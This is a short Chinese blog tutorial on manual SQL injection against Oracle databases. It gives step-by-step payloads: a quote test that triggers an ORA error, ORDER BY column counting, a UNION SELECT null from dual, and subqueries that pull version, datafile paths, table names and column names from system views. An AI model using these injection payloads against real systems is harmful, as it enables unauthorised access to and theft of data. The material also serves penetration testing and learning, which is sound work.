美文网首页
Oracle手工注入

Oracle手工注入

作者: 好好睡觉鸭 | 来源:发表于2020-11-05 16:22 被阅读0次

1、注入测试
参数后加上单引号,出现ORA-01756错误,初步判断存在注入,且数据库为Oracle

报错
2、order by
order by n--  正常
order by n+1--  错误

3、联合查询
使用null来确定显示位为数字型还是字符型:

union select null,null,'null',null,......,'null' from dual--

4、获取信息

select banner FROM v$version WHERE banner LIKE 'Oracle%' 数据库版本

数据库版本
select banner FROM v$version where banner like 'TNS%' 操作系统版本

版本信息
name FROM V$DATAFILE 获取DB文件路径

文件路径

5、获取表名

select TABLE_NAME from USER_TABLES where rownum=1

表名

6、获取列名

select (select column_name from user_tab_columns where table_name='AGD_FILE' and rownum=1) from dual--

列名

相关文章

  • Oracle手工注入

    1、注入测试参数后加上单引号,出现ORA-01756错误,初步判断存在注入,且数据库为Oracle 3、联合查询使...

  • Oracle手工注入小结

    前言: 明日复明日,明日何其多。既然这么多,不妨再拖拖。 Mysql和Mssql的注入环境都有了,手注也简单过了一...

  • ORACLE 注入

    1判断是什么数据库 and exist(select * from dual) and exists(select...

  • 手工注入

    1、加入单引号 ’提交, 结果:如果出现错误提示,则该网站可能就存在注入漏洞。 2、数字型判断是否有注入;语句:a...

  • 少年,这是我特意为你酿制的Oracle 注入,干了吧!

    最近遇到Oracle注入的测试越来越多,而且互联网上oracle注入的总结较为少见,为了能够快速的进行漏洞测试和挖...

  • 恢复oracle的软件权限

    在安装了 gi,oracle的情况下,如果我们手工修改了$ORACLE_HOME/bin/oracle的权限,如何...

  • access、mssql、mysql、oracle数据库手工注入

    Access注入: *.mdb形式 判断注入点: 1. '号出现报错(页面显示不完整)——容错性能 2. and ...

  • access/mssql手动注入

    一.本文介绍 1、本文介绍access手工注入、mssql注入获取webshell 二.手动注入 1、access...

  • 记一次sqlserver的手注

    第一种方法: 首先判断是否存在注入点 由此可知,网站存在注入,并未sqlserver注入 “--”是Oracle和...

  • Oracle注入大全

    联合查询注入 order by 3--and 1=2 union select null,null,null fr...

网友评论

      本文标题:Oracle手工注入

      本文链接:https://www.haomeiwen.com/subject/otaovktx.html